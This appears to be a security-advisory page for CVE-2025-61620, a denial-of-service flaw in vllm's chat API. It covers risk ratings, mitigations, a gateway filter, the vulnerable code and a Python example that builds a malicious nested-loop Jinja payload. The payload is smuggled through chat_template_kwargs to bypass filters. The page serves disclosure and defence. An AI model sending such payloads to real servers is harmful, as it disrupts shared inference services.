CVE-2025-61620: vllm: DoS via Jinja template injection in chat API

GHSA-6fvq-23cw-5628 MEDIUM
Published October 7, 2025
CISO Take

vllm's OpenAI-compatible server allows authenticated users to inject malicious Jinja templates via chat_template or chat_template_kwargs, exhausting CPU/memory and taking down LLM inference endpoints. The mitigation is non-trivial: blocking chat_template alone is insufficient because chat_template_kwargs can bypass controls via a dict.update overwrite. Upgrade to vllm >= 0.11.0 immediately; if not possible, restrict API access to fully-trusted clients and block both parameters at the gateway.

Risk Assessment

Medium CVSS (6.5) understates operational risk for organizations running vllm as a shared inference service. Exploitability is high — any authenticated API user can trigger it with a single malformed request requiring no special AI/ML knowledge. The non-obvious bypass via chat_template_kwargs means operators who implement partial mitigations remain fully exposed. In multi-tenant, developer-facing, or internally-shared deployments, this is a realistic availability risk with immediate blast radius across all downstream AI-dependent workloads.

Affected Systems

Package: vllm
Ecosystem: pip
Vulnerable Range: >= 0.5.1, < 0.11.0
Patched: 0.11.0


Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV: Network
AC: Low
PR: Low
UI: None
S: Unchanged
C: None
I: None
A: High

Recommended Action

5 steps
  1. PATCH

    Upgrade to vllm >= 0.11.0 (fix in PR #25794, commit 7977e50).

  2. CRITICAL WORKAROUND

    Block BOTH chat_template AND chat_template_kwargs at the API gateway — blocking only chat_template is insufficient due to the dict.update bypass path.

  3. ACCESS CONTROL

    Restrict vllm API endpoints to fully-trusted internal clients; never expose directly to end users or the internet without an authenticated proxy.

  4. RESOURCE LIMITS

    Implement request timeouts and per-request CPU/memory quotas on the inference server to contain blast radius.

  5. DETECTION

    Alert on requests containing chat_template or chat_template_kwargs fields in API request logs; monitor for sudden CPU/memory spikes on inference nodes correlating with individual API requests.
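The gateway-side blocking in steps 2 and 5 can be sketched as a simple request filter. This is a minimal illustration, not vllm code: the function name and rejection policy are illustrative; only the two field names come from the advisory. Note it rejects a request if either field is present at the top level, which covers the dict.update bypass because the override must ride inside the top-level chat_template_kwargs field.

```python
import json

# Hypothetical gateway-side filter: reject any chat-completions request body
# that carries either template-controlling field. Blocking only chat_template
# is insufficient, since chat_template_kwargs can smuggle a template in.
BLOCKED_FIELDS = {"chat_template", "chat_template_kwargs"}

def is_request_allowed(raw_body: bytes) -> bool:
    """Return False if the JSON body contains a blocked top-level field."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False  # malformed JSON: reject defensively
    if not isinstance(body, dict):
        return False
    return not (BLOCKED_FIELDS & body.keys())
```

A filter like this belongs in front of the inference server (reverse proxy, API gateway, or sidecar), so that vllm never sees the fields regardless of client behavior.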

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.9.3 - AI system risk treatment
NIST AI RMF
MANAGE-2.2 - Risks or benefits of the AI system are communicated and managed
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-61620?

vllm's OpenAI-compatible server allows authenticated users to inject malicious Jinja templates via chat_template or chat_template_kwargs, exhausting CPU/memory and taking down LLM inference endpoints. The mitigation is non-trivial: blocking chat_template alone is insufficient because chat_template_kwargs can bypass controls via a dict.update overwrite. Upgrade to vllm >= 0.11.0 immediately; if not possible, restrict API access to fully-trusted clients and block both parameters at the gateway.

Is CVE-2025-61620 actively exploited?

No confirmed active exploitation of CVE-2025-61620 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-61620?

  1. PATCH: Upgrade to vllm >= 0.11.0 (fix in PR #25794, commit 7977e50).
  2. CRITICAL WORKAROUND: Block BOTH chat_template AND chat_template_kwargs at the API gateway — blocking only chat_template is insufficient due to the dict.update bypass path.
  3. ACCESS CONTROL: Restrict vllm API endpoints to fully-trusted internal clients; never expose directly to end users or the internet without an authenticated proxy.
  4. RESOURCE LIMITS: Implement request timeouts and per-request CPU/memory quotas on the inference server to contain blast radius.
  5. DETECTION: Alert on requests containing chat_template or chat_template_kwargs fields in API request logs; monitor for sudden CPU/memory spikes on inference nodes correlating with individual API requests.

What systems are affected by CVE-2025-61620?

This vulnerability affects the following AI/ML architecture patterns: LLM inference APIs, model serving, RAG pipelines, agent frameworks, multi-tenant AI platforms.

What is the CVSS score for CVE-2025-61620?

CVE-2025-61620 has a CVSS v3.1 base score of 6.5 (MEDIUM).

Technical Details

NVD Description

### Summary

A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the `chat_template` and `chat_template_kwargs` parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.

### Details

When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In `hf/transformer`, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by `vllm serve` exposes a `chat_template` parameter that lets users specify that template. In addition, the server accepts a `chat_template_kwargs` parameter to pass extra keyword arguments to the rendering function.

Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.

Importantly, simply forbidding the `chat_template` parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for `apply_hf_chat_template` and then updates that dictionary with the user-supplied `chat_template_kwargs` via `dict.update`. Since `dict.update` can overwrite existing keys, an attacker can place a `chat_template` key inside `chat_template_kwargs` to replace the template that will be used by `apply_hf_chat_template`.

```python
# vllm/entrypoints/openai/serving_engine.py#L794-L816
_chat_template_kwargs: dict[str, Any] = dict(
    chat_template=chat_template,
    add_generation_prompt=add_generation_prompt,
    continue_final_message=continue_final_message,
    tools=tool_dicts,
    documents=documents,
)
_chat_template_kwargs.update(chat_template_kwargs or {})

request_prompt: Union[str, list[int]]
if isinstance(tokenizer, MistralTokenizer):
    ...
else:
    request_prompt = apply_hf_chat_template(
        tokenizer=tokenizer,
        conversation=conversation,
        model_config=model_config,
        **_chat_template_kwargs,
    )
```

### Impact

If an OpenAI-Compatible Server exposes endpoints that accept `chat_template` or `chat_template_kwargs` from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding `chat_template` inside `chat_template_kwargs`) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.

### Fixes

* https://github.com/vllm-project/vllm/pull/25794
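The bypass hinges on nothing more exotic than ordinary `dict.update` semantics. The following self-contained sketch mirrors the vulnerable code path; `apply_template_stub` is a hypothetical stand-in for `apply_hf_chat_template`, and both template strings are illustrative:

```python
from typing import Any

def apply_template_stub(**kwargs: Any) -> str:
    # Stand-in for vllm's apply_hf_chat_template: just report which
    # template it would render.
    return kwargs["chat_template"]

# Server-side defaults, built the same way as in serving_engine.py.
server_kwargs: dict[str, Any] = dict(chat_template="<<trusted default template>>")

# Attacker-controlled chat_template_kwargs from the request body. Even if the
# top-level chat_template parameter is blocked, this dict can carry its own
# chat_template key...
user_kwargs = {"chat_template": "{% for i in range(10**9) %}x{% endfor %}"}

# ...and dict.update overwrites the trusted key with the malicious value.
server_kwargs.update(user_kwargs or {})

# The rendering function now receives the attacker's template.
chosen = apply_template_stub(**server_kwargs)
```

This is why the advisory stresses that filtering only the `chat_template` parameter leaves the server fully exposed.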

Exploitation Scenario

An attacker with API credentials — an internal developer, a compromised service account, or a malicious user on a shared platform — sends a POST to /v1/chat/completions with a chat_template_kwargs body containing a chat_template key embedding a malicious Jinja template (e.g., nested loops iterating over exponentially large ranges). Because dict.update overwrites the server-side chat_template value, vllm processes the attacker-controlled template, consuming all available CPU and memory. The inference server becomes unresponsive to all legitimate traffic. In a shared GPU cluster, this disrupts every team dependent on the endpoint until the process is manually killed and restarted, with no data exfiltration required to achieve full service disruption.
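For concreteness, a request body matching the scenario above might be assembled as below. Everything here is illustrative: the model name is a placeholder, the loop bounds are stand-ins for the much larger values a real attack would use, and nothing is sent over the network or rendered.

```python
import json

# Illustrative malicious body: nested Jinja loops make rendering cost grow
# multiplicatively. The range sizes are placeholders only.
malicious_template = (
    "{% for i in range(100000) %}"
    "{% for j in range(100000) %}{{ i * j }}{% endfor %}"
    "{% endfor %}"
)

payload = {
    "model": "any-served-model",  # placeholder
    "messages": [{"role": "user", "content": "hi"}],
    # No top-level chat_template field: the override rides inside
    # chat_template_kwargs, defeating filters that block only chat_template.
    "chat_template_kwargs": {"chat_template": malicious_template},
}

body = json.dumps(payload)  # would be POSTed to /v1/chat/completions
```

The request passes any check that only inspects the top-level `chat_template` field, which is exactly the partial-mitigation trap the advisory warns about.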

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
October 7, 2025
Last Modified
October 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities